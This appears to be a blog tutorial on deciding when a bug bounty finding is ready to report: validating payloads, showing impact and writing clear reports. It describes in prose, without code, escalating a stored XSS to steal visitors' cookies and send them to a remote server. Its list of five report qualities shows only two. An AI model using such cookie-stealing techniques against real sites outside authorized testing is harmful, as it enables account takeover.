I’m writing this because I’ve been seeing people struggle to understand when they’re ready to submit a bug report. Maybe they find something interesting as they’re exploring an app through a bug bounty program, and so they immediately think they’re ready to submit the information. Or maybe they’re running automated tools, and the tool declared that it found a successful payload.
Either way, they’re usually not ready to write the report just yet. There’s more to it.
As I helped some of my students this week understand when they’re ready to submit a report, I came up with simple questions you need to ask and answer to understand if you’re ready.
Read on to see what they are, and how to submit a solid bug bounty report.
Special thanks to Hakluke (a former Bugcrowd employee) for additional tips and details that helped round out the article.
When are you ready to submit a bug bounty report?
You (or a tool you’re running) found something interesting in an application you’re checking out for bugs, and your heart starts to race as you get super excited.
“Can I submit a report right now?!“
That’s probably your immediate thought because you want to make sure you submit it before anyone else does…but chances are, you don’t actually have a bug bounty report to submit yet. You still need to gather more information or figure out if there’s an actual vulnerability that can be exploited in a meaningful way.
The industry often calls these PoCs (Proof of Concepts), and the first word in that acronym is key: proof.
This leads us to the set of questions you need to ask yourself (and answer completely) before you can consider what you have to be ready to go into a bug report:
- Do I have a successful payload? (that you’ve confirmed, not just that your tool said was successful)
- Am I able to do something of impact with my payload? (ie: extract private information, potentially negatively impact customers, etc…)
Let’s break it down further.
Do I have a successful payload?
While not all security bugs require payloads, many do, which is why it’s the first question to ask. If it doesn’t require a payload (ie: you checked the page’s source and saw PII), then you can immediately skip to the next question.
If what you’re doing does require a payload (SQLi, XSS, etc…), then do you have a payload that actually works?
I’m not talking about an automated tool that you ran that told you it was a successful payload. That could be a false positive. I’m asking if you’ve validated that the payload your automated tool found as successful is indeed a successful payload.
If it’s an XSS payload, does the XSS fire? If it’s an SQL injection payload, does the payload actually manipulate database queries? If not, you haven’t found a successful payload yet.
“My automation tool says the payload was successful” is not enough to submit a bug report. That could very well be a false positive, but even if it’s not, it may not give the organization enough information for them to identify and fix the issue. More often than not, though, it will be a false positive.
You have to keep going until you can validate the payload, and then answer this next question…
Am I able to do something of impact with my payload?
Let’s say you went through the first question and you validated that a payload works. Again, if we assume you’re going for XSS, you might have found a way to sneak in HTML tags to break out of an input field’s context.
That’s a fantastic starting point, but you’re still not ready to submit a report. Why? Because being able to inject an HTML tag doesn’t necessarily correlate to a security impact. If you want a payout or if you want your report to be taken seriously, you have to attach a security impact to your vulnerability.
For example, if the only HTML tag you’re able to add is a
<p> tag and nothing else, then there’s really nothing practical an attacker could do with that. However, if you’re able to inject your own malicious XSS script, and that script is capable of stealing a user’s cookie information that contains session information, which means you could take over a customer’s account that contains credit card information or other PII, then you’ve immediately escalated the impact of that vulnerability.
When I found a stored XSS vulnerability in an image alt attribute earlier this year, my process went a little bit like this:
- I noticed that a payload I had injected in an input field was firing on a different page (successful payload: CHECK)
- I tweaked my payload to see if I could access anything of value through the vulnerability, and I noticed I could grab all of the visitor’s cookie information (able to do something of impact: CHECK)
- While I probably could have submitted the report at this point, I wanted to validate whether I’d be able to tweak my payload again to send this cookie information to a remote server, so I modified the payload, set up a listening server, and validated that not only could I grab any visitor’s cookie information, but I could then send that information to a remote server (impact level confirmed and increased)
- Then I was ready to write my report…
…So let’s talk about what a good bug bounty report looks like.
What does a good bug report look like?
I asked Hakluke to share his thoughts on this topic because he’s seen his fair share of good and bad bug reports being that he worked at Bugcrowd (a bug bounty platform). He listed out 5 important things you should have in every single report you write:
- Clear reproduction steps
- Clear security impact
It’s unfortunate that he felt the need to include professionalism and empathy 🙂
I’ve seen some reports that come across as rude, condescending, <insert other adjective here>… Not only does this not help your case, but it reflects badly on the community as a whole. There’s really no need for it! Triagers have to sift through large amounts of reports and information every day, so please keep that in mind.
When it comes to accuracy and clear reproduction steps, I think it’s worth elaborating a bit more…
As you write your report, try to imagine that you’re the person who’s going to be reading your report. That person has absolutely no idea what you’ve been doing, so they’re missing all of the context that you have from working on finding the security bug (which will usually be hours worth of work that you have to condense into a simple report).
Help them out by providing clear, articulate, and accurate descriptions of where/what/how/who. Avoid jumping to conclusions in your report without explaining how you concluded that.
Try to be articulate in your explanations and use words or sentences that limit the potential for different interpretations. I understand that you may not be a native English speaker (and you may need to report in English) or grammar may not be your strong suite. There are apps to help you with that. Or ask someone who is fluent or better at it to help proofread (but be careful here — if it’s a private program, you can’t share any information with anyone else).
Finally, the last two points Hakluke made tie back to what I was saying earlier: describe clear reproduction steps (which you’ll be able to do since you answered my first question), and define a clear security impact (which you’ll be able to do since you answered my second question).
If you can’t add those last two things to your report, you do not have a complete report, and you need to test further before you can submit a report.
I hope this was helpful in clarifying what constitutes a good bug bounty report, and also what’s needed to write one. I didn’t include an actual template of what good reports look like because each platform already typically provides templates when you first start your submission.
Also, you can take a look at publicly disclosed reports and see which ones you find easy to follow versus not. This will give you a great indication of how you can write better reports, in addition to what I mentioned in the article.
Thanks for reading, and happy hunting!